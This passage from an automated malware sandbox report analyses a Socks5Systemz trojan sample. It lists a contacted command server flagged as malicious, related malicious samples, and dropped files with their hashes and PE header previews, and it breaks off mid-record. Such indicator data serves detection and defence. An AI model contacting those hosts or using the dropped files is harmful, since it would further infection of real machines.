                                        http://www.remobjects.com/psfile.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.openssl.org/fis-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.certum.pl/CPS0is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.208.158.248
                                        ceyqbgr.netSwitzerland
                                        34888SIMPLECARRER2ITtrue
                                        89.105.201.183
                                        unknownNetherlands
                                        24875NOVOSERVE-ASNLfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1520633
                                        Start date and time:2024-09-27 17:30:08 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 43s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:file.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@5/26@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 91%
                                        • Number of executed functions: 199
                                        • Number of non-executed functions: 250
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: file.exe
                                        TimeTypeDescription
                                        11:31:33API Interceptor623663x Sleep call for process: gerdaplay3se.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.208.158.248boSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                            8b8h4p07ND.exeGet hashmaliciousSocks5SystemzBrowse
                                              mfRfEQGtYF.exeGet hashmaliciousSocks5SystemzBrowse
                                                oFzEHfD9N6.exeGet hashmaliciousSocks5SystemzBrowse
                                                  Wf6rwc9MMw.exeGet hashmaliciousSocks5SystemzBrowse
                                                    25g5vdifBs.exeGet hashmaliciousSocks5SystemzBrowse
                                                      J2alzv5eSV.exeGet hashmaliciousSocks5SystemzBrowse
                                                        umEy816YEG.exeGet hashmaliciousSocks5SystemzBrowse
                                                          2775314a8dee2f5d2048bce245632405d6eac2278f10a.exeGet hashmaliciousSocks5SystemzBrowse
                                                            89.105.201.183cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 200
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            NOVOSERVE-ASNLboSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            mfRfEQGtYF.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            oFzEHfD9N6.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            Wf6rwc9MMw.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            25g5vdifBs.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            umEy816YEG.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            2775314a8dee2f5d2048bce245632405d6eac2278f10a.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            3ijG5xBRYz.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            QU3gBL2Pvl.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 89.105.201.183
                                                            SIMPLECARRER2ITboSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            http://0e0hshi.trafiklite.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • 185.208.158.9
                                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            WG Viridium-gruppe requests your signature on 'Viridium-gruppe Employees Benefit Enrollment.pdf'.msgGet hashmaliciousHTMLPhisherBrowse
                                                            • 185.208.158.9
                                                            https://www.google.cf/amp/%E2%80%8BjuCGrUR%E2%80%8B.%E2%80%8Bs%C2%ADun%C2%ADb%C2%ADu%C2%ADrs%C2%ADt%C2%ADsh%C2%ADe%C2%ADlti%C2%ADes%C2%AD.c%C2%ADo%C2%ADm%E2%80%8BGet hashmaliciousHTMLPhisherBrowse
                                                            • 185.208.158.9
                                                            8b8h4p07ND.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            EvKSsyJozV.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.196.8.214
                                                            mfRfEQGtYF.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            oFzEHfD9N6.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            Wf6rwc9MMw.exeGet hashmaliciousSocks5SystemzBrowse
                                                            • 185.208.158.248
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Gerda Play3 SE\Qt5OpenGL.dll (copy)boSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                                              file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  8b8h4p07ND.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    EvKSsyJozV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      mfRfEQGtYF.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        oFzEHfD9N6.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          Wf6rwc9MMw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            25g5vdifBs.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              J2alzv5eSV.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                Process:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3264512
                                                                                Entropy (8bit):6.621138966820118
                                                                                Encrypted:false
                                                                                SSDEEP:49152:UbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:q2viP820JA3XXunANPRt
                                                                                MD5:D9BDC42F41BCE78D0C9D0FB3AC33D0DF
                                                                                SHA1:C4D13F9A91F778222B539DA02B58F3FE069F2333
                                                                                SHA-256:4BACC77E67D4ACA2F30C0D3ADF173D9BF18C0653E6362288B7481911C202736F
                                                                                SHA-512:A95F074A16F2D5B577C897DFBF147490CAEC0E9EA0B864CA70735072940974A265AA4E2BC2B1EC42106E19E676BAD47EC822B31BD0790AF207490A82BEC2FB93
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                File Type:ISO-8859 text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8
                                                                                Entropy (8bit):2.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Ll/:Ll/
                                                                                MD5:6EFBBD4B588A8E19A5F96973243199AA
                                                                                SHA1:A62893F88D54BFAD713C2B6D8C608E172B4BBEB5
                                                                                SHA-256:D7C963C3F366A2D20A921D5C537B75025E344F7DBA6237A702A3B834472C105F
                                                                                SHA-512:C8D8B439AA0FD337414314F0FE2B3D3E5A0762A536542A6EC20AB35641AD2E58348C7672AE7D0348D8A618EF88061F9EF21BAF3A3658CD373C0797FF3DC40264
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...f....
                                                                                Process:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):0.8112781244591328
                                                                                Encrypted:false
                                                                                SSDEEP:3:cln:Un
                                                                                MD5:2DC89ABB98D04AF2C94CC8B59EBD2B63
                                                                                SHA1:C2568696F7E531313A1300CA830F7051E1A85475
                                                                                SHA-256:8D4CD219A8179C66ACD195D0F07C34721C87ED2241A9DE78A228B7B336488BC8
                                                                                SHA-512:5085394D311E525AC7B549D4353FDDAAB0BFBA3C291F4B031BA27A0EDD5B71D4DF15BC030CDB7BF09EA3CBDB858F193C9EE5302131F4A823F4CC961F1ADC0AF0
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:Y...
                                                                                Process:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):128
                                                                                Entropy (8bit):2.9545817380615236
                                                                                Encrypted:false
                                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                Process:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):128
                                                                                Entropy (8bit):1.7095628900165245
                                                                                Encrypted:false
                                                                                SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                                MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                                SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                                SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                                SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):334848
                                                                                Entropy (8bit):6.5257884005400015
                                                                                Encrypted:false
                                                                                SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                                                MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                                                SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                                                SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                                                SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: boSodF2WmT.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: 8b8h4p07ND.exe, Detection: malicious, Browse
                                                                                • Filename: EvKSsyJozV.exe, Detection: malicious, Browse
                                                                                • Filename: mfRfEQGtYF.exe, Detection: malicious, Browse
                                                                                • Filename: oFzEHfD9N6.exe, Detection: malicious, Browse
                                                                                • Filename: Wf6rwc9MMw.exe, Detection: malicious, Browse
                                                                                • Filename: 25g5vdifBs.exe, Detection: malicious, Browse
                                                                                • Filename: J2alzv5eSV.exe, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):3264512
                                                                                Entropy (8bit):6.621138966820118
                                                                                Encrypted:false
                                                                                SSDEEP:49152:UbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:q2viP820JA3XXunANPRt
                                                                                MD5:D9BDC42F41BCE78D0C9D0FB3AC33D0DF
                                                                                SHA1:C4D13F9A91F778222B539DA02B58F3FE069F2333
                                                                                SHA-256:4BACC77E67D4ACA2F30C0D3ADF173D9BF18C0653E6362288B7481911C202736F
                                                                                SHA-512:A95F074A16F2D5B577C897DFBF147490CAEC0E9EA0B864CA70735072940974A265AA4E2BC2B1EC42106E19E676BAD47EC822B31BD0790AF207490A82BEC2FB93
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):334848
                                                                                Entropy (8bit):6.5257884005400015
                                                                                Encrypted:false
                                                                                SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                                                MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                                                SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                                                SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                                                SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):348160
                                                                                Entropy (8bit):6.542655141037356
                                                                                Encrypted:false
                                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1471856
                                                                                Entropy (8bit):6.8308189184145665
                                                                                Encrypted:false
                                                                                SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                                                MD5:A236287C42F921D109475D47E9DCAC2B
                                                                                SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                                                SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                                                SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):499712
                                                                                Entropy (8bit):6.414789978441117
                                                                                Encrypted:false
                                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):392048
                                                                                Entropy (8bit):6.542831007177094
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                                MD5:EE856A00410ECED8CC609936D01F954E
                                                                                SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                                SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                                SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):3264512
                                                                                Entropy (8bit):6.621138809004119
                                                                                Encrypted:false
                                                                                SSDEEP:49152:bbrpJskkyKBsYG8204wA3XBU+un8G304iXPPJt:t2viP820JA3XXunANPRt
                                                                                MD5:A8740950E0037721B6C0B49E9C07BEBB
                                                                                SHA1:44E25D73106445E81AC5049E89D4FB862388ED12
                                                                                SHA-256:1A74AE8780E1EDAFA3639FDE58E9BB8F4960F666681531E1DE67BDC074C81ABC
                                                                                SHA-512:0A98D882A71699C4002A8D0B71CC973867EBE6A98B2BBEDA7EDFFE9196C2D82CC71B6D4498C327A016A09A4E5D6C027B3EAAB7ED1F0289D058EBD90A7ACADF61
                                                                                Malicious:false
                                                                                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P&.L.................."..@.......["......."...@...........................2......Y2......................................."......`#..............................................................................."..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT....#..0....#.............@....rsrc........`#......0#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):719720
                                                                                Entropy (8bit):6.620042925263483
                                                                                Encrypted:false
                                                                                SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                                                MD5:20B6B06BBD211A8ACFE51193653E4167
                                                                                SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                                                SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                                                SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1471856
                                                                                Entropy (8bit):6.8308189184145665
                                                                                Encrypted:false
                                                                                SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                                                MD5:A236287C42F921D109475D47E9DCAC2B
                                                                                SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                                                SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                                                SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):719720
                                                                                Entropy (8bit):6.620042925263483
                                                                                Encrypted:false
                                                                                SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                                                MD5:20B6B06BBD211A8ACFE51193653E4167
                                                                                SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                                                SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                                                SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
